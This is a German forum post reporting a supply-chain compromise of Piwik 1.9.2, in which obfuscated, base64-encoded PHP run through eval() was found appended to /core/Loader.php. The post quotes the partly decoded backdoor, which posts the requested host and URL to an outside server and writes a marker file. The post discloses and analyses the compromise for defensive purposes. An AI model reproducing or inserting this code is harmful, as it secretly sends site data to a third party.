Lord Gurke
Nur echt mit 32 Zähnen
Hallo,
ich habe heute eine Piwik-Installation auf die Version 1.9.2 upgegraded und von da an Probleme mit dem Interface gehabt.
Ursache war, dass sich in der Datei /core/Loader.php ganz unten Code befand (Base64-Codiert, mit eval() ausgeführt - sic!) der Short-Tags benutzt die auf meinem System nicht aktiviert sind.
Hier mal auszugsweise der "entschlüsselte" Code:
Sieht hier schon nicht nach "Quelloffener Statistik" aus...
Ich habe den Code ein bisschen geprüft und teilweise herausgefunden was er tut - aber noch nicht warum er es tut...
Er übermittelt den angefragten Host und die Request-URL an die Adresse http: // prostoivse.com/x.php und legt eine Datei namens "lic.log" an. Sobald diese vorhanden ist, scheint das Dingen aber erstmal nichts mehr zu machen oder nach außen zu übermitteln.
Hat jemand von euch eine Piwik-Installation vor 1.9.2 und kann da mal in die Datei schauen? Momentan befürchte ich, dass der Piwik-Server geknackt wurde und die herunterladbaren Archive infiziert sind. Ich habe zur Sicherheit schonmal die Piwik-Entwickler angeschrieben, aber das ist erst 5 Minuten her, daher habe ich da noch keine Rückmeldung.
ich habe heute eine Piwik-Installation auf die Version 1.9.2 upgegraded und von da an Probleme mit dem Interface gehabt.
Ursache war, dass sich in der Datei /core/Loader.php ganz unten Code befand (Base64-Codiert, mit eval() ausgeführt - sic!) der Short-Tags benutzt die auf meinem System nicht aktiviert sind.
Hier mal auszugsweise der "entschlüsselte" Code:
PHP:
function _1487432521($i){$a=Array('TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjEuNikgR2Vja28vMjAwNzA3MjUgRmlyZWZveC8yLjAuMC42','SFRUUF9IT1NU','UkVRVUVTVF9VUkk=','Jg==','JTI2','aHR0cDovL3Byb3N0b2l2c2UuY29tL3gucGhw','L2xpYy5sb2c=','cmVmZj0=','aHR0cA==','bWV0aG9k','UE9TVA==','Y29udGVudA==','aHR0cA==','aGVhZGVy','cmI=','cmVmZj0=','L2xpYy5sb2c=','YSs=','cGl3aWs=','Cg==');return base64_decode($a[$i]);}
Error_Reporting(round(0));
$_0=round(0+5);
$_1=_1487432521(0);
$_2=$_SERVER[_1487432521(1)] .$_SERVER[_1487432521(2)];
$_2=$GLOBALS['_319299206_'][0](_1487432521(3),_1487432521(4),$_2);
$_3=_1487432521(5);
if($GLOBALS['_319299206_'][1]($GLOBALS['_319299206_'][2](__FILE__) ._1487432521(6)))exit;
function l__0($_4,$_1,$_5,$_6){$_7=$GLOBALS['_319299206_'][3]();
$GLOBALS['_319299206_'][4]($_7,CURLOPT_URL,$_4);
$GLOBALS['_319299206_'][5]($_7,CURLOPT_USERAGENT,$_1);
$GLOBALS['_319299206_'][6]($_7,CURLOPT_TIMEOUT,$_5);
$GLOBALS['_319299206_'][7]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.25+0.25+0.25+0.25));
$GLOBALS['_319299206_'][8]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));
$GLOBALS['_319299206_'][9]($_7,CURLOPT_POST,round(0+0.333333333333+0.333333333333+0.333333333333));
$GLOBALS['_319299206_'][10]($_7,CURLOPT_POSTFIELDS,_1487432521(7) .$_6);
$_8=$GLOBALS['_319299206_'][11]($_7);
$GLOBALS['_319299206_'][12]($_7);
return $_8;
}function l__1($_9,$_10,$_11=l__2){$_12=array(_1487432521(8)=> array(_1487432521(9)=> _1487432521(10),_1487432521(11)=> $_10));
if($_11 !== l__2){$_12[_1487432521(12)][_1487432521(13)]=$_11;
}$_13=$GLOBALS['_319299206_'][13]($_12);
$_14=@$GLOBALS['_319299206_'][14]($_9,_1487432521(14),false,$_13);
if(!$_14){return false;
}$GLOBALS['_319299206_'][15]($_14,round(0+5));
$_15=@$GLOBALS['_319299206_'][16]($_14);
if($_15 === false){return false;
}return $_15;
}$_16=l__1($_3,_1487432521(15) .$_2);
if($_16 == false){$_16=l__0($_3,$_1,$_0,$_2);
}$_17=$GLOBALS['_319299206_'][17](($GLOBALS['_319299206_'][18](__FILE__) ._1487432521(16)),_1487432521(17));
$GLOBALS['_319299206_'][19]($_17,_1487432521(18) ._1487432521(19));
$GLOBALS['_319299206_'][20]($_17);
$GLOBALS['_319299206_']=Array(base64_decode('c3RyX' .'3JlcGxhY2U='),base64_decode('Z' .'mlsZV9leGl' .'zdHM='),base64_decode('ZGly' .'bm' .'FtZ' .'Q=='),base64_decode('Y3VybF9pb' .'ml0'),base64_decode('Y3VybF9zZX' .'R' .'vcHQ='),base64_decode('' .'Y3' .'Vyb' .'F9zZXR' .'vcHQ='),base64_decode('Y3Vy' .'bF9z' .'ZXRvcHQ='),base64_decode('' .'Y3' .'V' .'yb' .'F' .'9zZXRvcHQ='),base64_decode('Y3V' .'ybF9zZXRvc' .'HQ='),base64_decode('Y' .'3VybF9zZXR' .'vc' .'HQ='),base64_decode('Y3' .'Vy' .'bF9z' .'ZX' .'RvcH' .'Q='),base64_decode('Y3VybF9l' .'eGVj'),base64_decode('Y3VybF9jbG9zZQ=='),base64_decode('c' .'3R' .'yZW' .'FtX2N' .'vbnRleHRfY' .'3JlYXRl'),base64_decode('' .'Zm9wZW' .'4='),base64_decode('c3RyZW' .'FtX3N' .'ldF90aW1l' .'b3V0'),base64_decode('c3RyZWFtX2dldF9' .'jb' .'250ZW50cw=='),base64_decode('' .'Zm9wZ' .'W4' .'='),base64_decode('' .'ZGlybmF' .'t' .'Z' .'Q' .'=' .'='),base64_decode('Z' .'ndyaX' .'Rl'),base64_decode('' .'Z' .'mN' .'sb' .'3Nl'));
Sieht hier schon nicht nach "Quelloffener Statistik" aus...
Ich habe den Code ein bisschen geprüft und teilweise herausgefunden was er tut - aber noch nicht warum er es tut...
Er übermittelt den angefragten Host und die Request-URL an die Adresse http: // prostoivse.com/x.php und legt eine Datei namens "lic.log" an. Sobald diese vorhanden ist, scheint das Dingen aber erstmal nichts mehr zu machen oder nach außen zu übermitteln.
Hat jemand von euch eine Piwik-Installation vor 1.9.2 und kann da mal in die Datei schauen? Momentan befürchte ich, dass der Piwik-Server geknackt wurde und die herunterladbaren Archive infiziert sind. Ich habe zur Sicherheit schonmal die Piwik-Entwickler angeschrieben, aber das ist erst 5 Minuten her, daher habe ich da noch keine Rückmeldung.